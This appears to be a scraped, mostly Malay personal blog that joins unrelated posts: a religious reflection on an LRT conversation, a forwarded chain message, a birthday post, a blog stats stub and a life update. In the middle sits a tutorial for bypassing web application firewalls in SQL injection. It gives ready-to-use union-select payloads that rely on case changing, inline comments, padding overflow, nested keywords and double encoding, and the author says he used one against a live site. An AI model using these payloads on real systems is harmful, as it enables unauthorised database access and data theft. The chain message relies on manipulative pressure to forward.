There’s ISLAM, But There’s No Muslim


I was on my way home, naik LRT..
Turun tangga..nak tunggu lrt..smbil pegang buku ISLAM : THE MISUNDERSTOOD RELIGION karya DR.DANIAL ZAINAL ABIDIN sebab nak habiskan baca..
Time turun tangga tu dah prasan dah ada org perhati..turun2 tangga je kne lalu depan org yg perhati tadi..lelaki.
dia sgt berminat tengok buku yg
sy pegang tu..tp sy buat biasa je la..

Suddenly..
A ( lelaki tadi ) : Assalamualaikum
Tapi sy x dgr sgt..then dia repeat ..
” Assalamualaikum ”

*dalam hati..”eh..dia Muslim ke?”
B ( Me ) : Waalaikumussalam

A : You read that book? about Islam? you’re Muslim right?

B : yeah..Alhamdulillah,i’m Muslim..
This book?ouh,juz to gain more knowledge about Islam to help me explain about this religion to the non-Muslims..

A : ouh..haha..funny right,Islam is there,but not Muslim..
( * time ni sy x clear sgt apa dia cakap )

B : where are you from?

A : I’m from Palestine

B : Palestine?really??are you Muslim?

A : I was, but then I changed.

B : u changed? do u mean have converted?

A : yeah..now I’m free..a free thinker..

B : but why?

A : hmm..THERE’S ISLAM..BUT THERE’S NO MUSLIM IN THIS WORLD..

B : wait..what are u trying to say?

A : ouh my god,u didn’t understand me..
B : no, no, just confused, do u mean..THERE’S NO REAL MUSLIM NOWADAYS?

A : yeah..hmm..Islam is the best religion right..the real religion, you know right??

B : yeah..I know..and I Believe..

A : me too,I believed but..huh..there’s no Muslim..

Die nak cakap..dunia sekarang ni TAK WUJUD DAH INSAN YANG BERGELAR MUSLIM..ISLAM ADA, TP MUSLIM DAH TAKDE

Then..sy trus tanya..
B : if u said so, why don’t u try to be one? the real Muslim I mean..

A : huh..good question..hmm..TO BE THE REAL MUSLIM IN THIS WORLD,IT’S IMPOSSIBLE..IF YOU WANNA BE THE REAL MUSLIM, YOU CAN’T LIVE HERE,YOU CAN’T LIVE IN THIS WORLD..EVERYTHING CHANGED SISTER..THIS
WORLD WAS SO CRUEL TO US, THEY CLAIM US AS TERRORISTS..

Sy terdiam..terpaku..terkaku..mcm2 benda dtg singgah kat otak..tp x tau nak cakap apa..otak jam..
Dia smbung lg..

A : I saved half of Al-Quran in my heart..my mind..I’m a HAFIZ also..I wanna ask you, you pray 5 times a day, right?

B : yeah,alhamdulillah

A : we face the Kaabah as our direction for solah..where’s our FIRST QIBLAH?

B : Masjid Al-Aqsa..Baitul Maqdis??

A : yeah,but now it’s sold,it’s sold,it’s sold sister, the jews conquered it..
( * muka dia mcm kecewa )

Tetiba…
A : i’ll stop at KLCC

B : ouh,ok..
( sy proceed baca buku tadi..time tu part JESUS, SON OF GOD )

Die trus tanya..
A : where’s JESUS born?

B : I don’t know..where?

A : you don’t know? but u called yourself Muslim..he was born at (apa ntah nama tmpat dia..x clear sgt sbb bising dalam lrt )

B : where is it??

A : uhhhhh sisterrrr read more..read more..then u’ll know..I’m right..THERE’S NO MUSLIM NOWADAYS..

Sy diam je..cara dia nmpak mcm nak test sy je sbenarnya..hmm..sy sambung baca..lrt smpai kat KLCC

A : tq sister,i’ve got to go,read more..

Saye pon duduk sbb ada tmpat kosong..Then..terngiang2 kat telinga..
THERE’S ISLAM BUT THERE’S NO MUSLIM..
THERE’S ISLAM BUT THERE’S NO MUSLIM..
THERE’S ISLAM BUT THERE’S NO MUSLIM..
Tengok sekeliling..
Perempuan free hair..
Lelaki pakai subang,rantai..
Perempuan pakai baju ketat2..
Lelaki pakai short..
tibe2..
Drop..by drop..by drop..makin laju..
Btol..sy x nampak sesape pon yg berperwatakan macam Muslim..
Even me..
Rasulullah cakap..
” ALMUSLIM MAN SALIMAL MUSLIM BILISANIHI WAYADIH ”
” Muslim itu ialah yang menyelamatkan muslim yang lain menggunakan lidah dan tangannya ”
Tapi apa yg sy buat bila nmpak saudara seIslam yg lain sedang berjalan ke neraka??
Sy biarkan..sy x selamatkan..

Am I still a Muslim in your eyes ya Allah? ya Rasulullah??

Rasulullah cakap..”Muslim itu bukan seorang yang menghina”
Berapa ramai antara kita mengaku MUSLIM tapi selalu menghina??
Muslim itu mengucap dua kalimah
syahadah..berapa ramai yang betul2 faham syahadah yang diucapkan??
ASYHADU AN LAA ILAHA ILLALLAH,WA ASYHADU ANNA MUHAMMADAN RASULULLAH?

Muslim itu yang menunaikan solat 5 waktu sehari semalam..
berapa ramai lagi yang kantoi
solat 5 waktu??
Still brani mengaku MUSLIM..
Brape ramai yg solatnya di awal waktu?
Brape ramai yg btol2 faham ape yg dibaca dalam solat tu?
Part ni pon kita x lepas..apa ntah lagi pasal solat2 yg lain..
SOLAT JAMA’,SOLAT QASAR,SOLAT KHAUF,SOLAT WAKTU SAKIT..
kalau org tanya..kite boleh jawab?
Saye pon x lepas..bab solat pon sangkut..
Muslim tu yg membayar zakat..berapa ramai still tahan harta utk bayar zakat?
Brape ramai yg btol2 faham zakat tu ape?
Brape rmai yg boleh explain ape tu zakat??
Saye pon x boleh..hmm..pasal rukun Islam pon x lepas..
Muslim tu yg berpuasa pada bulan Ramadhan..
Brape ramai yg still x puasa?
Brape ramai yang dapat capai matlamat puasa ( taqwa ) ??
Brape ramai boleh explain perihal puasa btol2??
Bila orang tanya..kite terdiam..pegi refer ustaz,ustazah..
Mengaku ISLAM..rukun Islam x lepas..
Muslim tu mengerjakan haji bila mampu..
Berapa ramai yg dapat duit mendahulukan vacation ke tmpat lain drpd pegi haji?
Brape ramai tau perihal haji Rasulullah?
Brape ramai tau haji ni ape sbnarnya?
Brape ramai dpt explain pasal haji kalau org tanya?
Sy pon fail..banyak benda xtau..
Kita sibuk menjangkau ilmu2 lain..
ILMU TENTANG RUKUN ISLAM PON KITA TAK LEPAS..
Dlm alQuran disebut..Muslim itu org yg
bertawakkal kat Allah..org yg berharap kat Allah..
Brape ramai yg meletakkan harapan kat
manusia?
Brape rmai yg brharap pncuci muka dpt
mmbersihkan mukanya?
Brape rmai yg brharap duit dpt membahagiakan hidupnya?
Ramai..
Nak jadi Muslim yg baik pon kita x lepas..apa tah lagi nak jadi Mu’min..MUHSIN? Allah..x tau bila..
Still ramai lagi yg bermentaliti nak jadi MUSLIM yg biasa2 je..
Kita lupa..kita kat akhir zaman..macam2 ujian datang..iman yg biasa2 x dapat selamatkan kita..
Again..DUNIA SEKARANG MEMANG KEJAM DENGAN MUSLIM..TAPI INGAT..BUKAN SENGAJA ALLAH CIPTAKAN KITA KAT ZAMAN NI..
KITA MAMPU..SEBAB TU ALLAH IZINKAN KITA HIDUP DI ZAMAN FITNAH NI..
Muslim itu akan muncul..
Bila kite sedar yg kita belum lagi the real Muslim..
Orang yang sedar itu dia bertindak..
Orang yang setakat tahu..hanya berdiam diri..
Kekuatan bukan ditunggu..tapi dicari..
Ilmu juga bukan ditunggu..tapi dicari..
JANGAN RASA SELAMAT DENGAN IMAN YANG SEKELUMIT

#‎copypaste
#‎orangmembencibilakitamenegur
#‎moga Allah redhadengandakwahyangsekecillnya.

Kalau Nak BI anda Bagus, Baca Ni!!!
– – Please read this to the end. You hardly have time for Allah. He loves you and always blesses you. He is always with you. I need you to spend 30 minutes of your time with Him today. Don’t pray. Just praise. Today I want this message across the world before midnight. Will you help? Please do not cut it, He always helps you with something that you are in need of. Please, drop everything & pass it on. Don’t break this chain. Why do we feel sleepy in Prayer, But stay awake through a 3 hour movie? Why are we so bored when we look at the AL-QURAN, But find it easy to read other books? Why is it so easy to ignore a msg about Allah, Yet we forward the nasty ones? Why are Prayers getting smaller, But bars and clubs are expanding? Why is it so easy to worship a celebrity, But very difficult to engage with Allah? Think about it, are you going to forward this? Are you going to ignore it, because, you think you will get laughed at? Forward this to all your friends. 80% of you won’t forward this. Allah said: If you deny me in front of your friends, I will deny you on the day of judgment: When one door closes, Allah opens two: If ALLAH has opened doors for you, send this message to everyone including me… Allah has no BLACKBERRY but He’s my favorite contact. He is not on TWITTER but I still follow Him. & even without the INTERNET I am always connected to Him. He is not on WHATSAPP but, He’s always online. Send this to everyone, including me. If Allah has helped you, and been there for you in every step of your life. 🙂 😢 Sorry for disturbing you.

C&P
80% manusia takkan baca amanat ni apatah lg share..

Bypassing WAF Filters in SQLi


Asalamu’alaikum…

Now i m goin to show how to bypass WAF filters.

Before All make sure u have knowledge in SQLi.

Ok Let’s Start..

What is WAF or Web Application Firewall>?

-A web application firewall (WAF) is an appliance,server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.


Some website are using WAF filter.

If u found a vuln sites that have waf and u try to inject a Union based query and its Show’s Not Acceptable, 403 forbidden or Web Application FIrewall ALERT..That means the query or syntax that u inject is Filter or Blocked by WAF.

Ok now here’s some method to Bypass WAF filters.

1)Comments:

SQL comments are a blessing to us SQL injectors. They allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query. Some comments in SQL:

//, ? , /**/, #, ?+, ? -, ;


2)Case Changing:

Some WAF?s will filter only lowercase attacks As we can see we can easily evade this by case changing:

Possible Regex filter:

/union\sselect/g

id=1+UnIoN/**/SeLeCT, or with XSS -> alert(1)


3)Inline Comments:

Some WAF?s filter key words like /union\sselect/ig We can bypass this filter by using inline comments most of the time, More complex examples will require more advanced approach like adding SQL keywords that will further separate the two words:

id=1/*!UnIoN*/SeLeCT

Take notice of the exclamation point /*!code*/ The exclamation point executes our SQL statement.

Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can add more inline comments. For example, let?s pretend a site filters union,where, table_name, table_schema, =, and information_schema.. These are 3 statements we need to inject our target.

For this we would:

id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()? –

The above code would bypass the filter. Notice we can use ?like? instead of ?=?

Another way to use inline comemnts, when everything seems to fail you can try to through the application Firewall off by crafting a SQL statement using variables:

id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()? –

The above code should bypass the Union+select filters even where common inline comments didn?t work itself

4)Buffer Overflow:/Unexpected input:

A lot of WAFS are written in the C language making them prone to overflow or or act differently when loaded with a bunch of data. Here is a WAF that does it?s job correctly, but when given a large amount of Data allows the malicious request and response.

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A?s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),use r(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26

,27,28,29,30,31,32,33,34,35,36?+

This bypass above works. I myself just used this against a Web site recently.

5)Replaced keywords(preg_replace and/or WAF?s with the same action

Sometimes and application will remove all of a keyword. For instance, let?s say we have a filter that replaces union select with whitespace. We could bypass that filter like so:

id=1+UNIunionON+SeLselectECT+1,2,3?

As you can see once union+select has been removed our capital UNION+SELECT takes its place successfully injecting our query:

UNION+SELECT+1,2,3?


6)Character encoding:

Most WAF?s will decode and filter an applications input, but some WAFs only decode the input once so double encoding can bypass certain filters as the WAF will decode the input once then filter while the Application will keep decoding the SQL statement executing our code.

Examples of double encoding:

id=1%2f%2a*/UNION%2f%2a /SELECT%2f%2a*/1,2,password%2f%2a*/FROM%2f%2a*/Users?+ 

[# Tut By Pain006 ]

when you get an error at a number, that number will be ONE TOO MUCH. so don’t count it.

for example, order by 8 <= no error | order by 9 <= error, then we have 8 columns. and it will be union all select 1,2,3,4,5,6,7,8– –

enjoy 

16 Jamadil-Awwal 1436 Hijriyyah.


Assalamu’alaikum warahmatullahi wabaarakaatuh.

Alhamdulillah, syukur kehadrat Illahi kerananya, aku masih diberi nafas untuk meneruskan kehidupan di bumi-Nya untuk terus berusaha dalam mengerjakan amal ibadat yg diperintahkan..masih diberi kekuatan untuk berdiri, masih diberikan hati yg kuat untuk memahami, masih gagah untuk berjalan dan masih mampu untuk menaip sepatah dua kata dalam public diari aku yang banyak kekurangan ini.

Hari ni, genaplah 29 tahun lepas aku dilahirkan. Allah sahaja yang tahu macammana kehidupan aku selama 7 tahun di kotaraya Kuala Lumpur. Aku nak ucapkan selamat hari lahir buat teman-teman ku yg menyambut hari lahir pada 6 Mac ini yakni Aida, Akma n Faridah… Semoga kalian selalu dirahmati Allah s.w.t , dilimpahkan rezeki yang melimpah ruah, dikurniakan kesihatan yang berpanjangan, dan diberkati dengan umur yang panjang.

Aku bersyukur kehadrat Illahi kerana menganugerahkan aku dengan keluarga yang menyayangi aku, sahabat handai yang selalu membantu aku dikala susah, teman seperjuangan di MML, MPI, SMKDAM, UiTM, dan UniKL ( maaf, tak sebut nama korang ).. Dan xlupa juga buat insan tersayang Afzan yg sentiasa ada dibelakangku ( walaupun kadang-kadang berada dihadapanku ). Kalian semua akan selalu aku doakan.

Wassalam.

image

Posted from Nokia N900

2014 in review


The WordPress.com stats helper monkeys prepared a 2014 annual report for this blog.

Here’s an excerpt:

The concert hall at the Sydney Opera House holds 2,700 people. This blog was viewed about 12,000 times in 2014. If it were a concert at Sydney Opera House, it would take about 4 sold-out performances for that many people to see it.

Click here to see the complete report.

jz updated


salam geng…

ak rse da lme ngat ak xupdate ape2 kt cni…huhu…al-maklumlah kebizian yang memanjang jer…n skrg ak da upgrade kje dr technician dl kepada network engineer…ALHAMDULILLAH….rezeki bertambah lg…leh cpt sikit kawen nt…kikiki…n pada budak2 MIIT, siyes, ak rse cam nk jmpe korg…lpk n gelak2 cam dl…haish…xabis2 perangai budak2 ak kn…tp tu lah ak…hehe…memg ade ank nt pon cmni la perangai ak…

kadang2 ak terpk gk mne ilangnya hekmah sengal, dayah, mira, shah, ayoi, kiko, ijat pacat, bana, mamu sume…nmpak kt pesbuk jela ug updatenye…pejam celik pejam celik da 2014 skrg…n dh nk msk feb dh…bnyak sngt bnda yg ‘berlaku’ spnjg 2 taun nih…n plg penting cik are la yg sll ade kt sebelah ak time susah senang…haha…

ketika ak sedang menaip nih, ak kt KLIA2…benti pnt sat jauh dh perjalanan ak hr ni…idup lam projek cmni la jadinya…xde life langsung rse…yg taw, siang2 site, malam2 kt umh jelah…bl badan dah penat, otak da letih, mmg xdan la nk mikir psl blog nih…ak belek bce blk blog2 ak dr zmn2 awl perkenalan dengan si blog nih…huhu…ade lg blogspot ak…ak ingt dh del ats sb2 tertentu…tp xilang gk dr tenet nih….encik amran, boleh x ajar ana hack server internet nih…sifu bana pon tulung la…

kehadapan sahabatku cik dayah, bl nk mkn bubur jagung nih???????

kepada bff ak,cik nora, bl nk blk mesia nih??? nt blk gtaw yer..dh la pegi hrtu xgtaw…

ak akn luang kan mse ak kt kg nxt week sambut raya..hehe. tdo kt pantai mlm2 pon bez gk…release tension… kna pk kn ape next step ak nih…bnyk bnda yg nk buat…haha…so, sekian dl…kna smbung kje blk…

JAZAAKUMULLAHU KHAIRAN KATHIIRAA..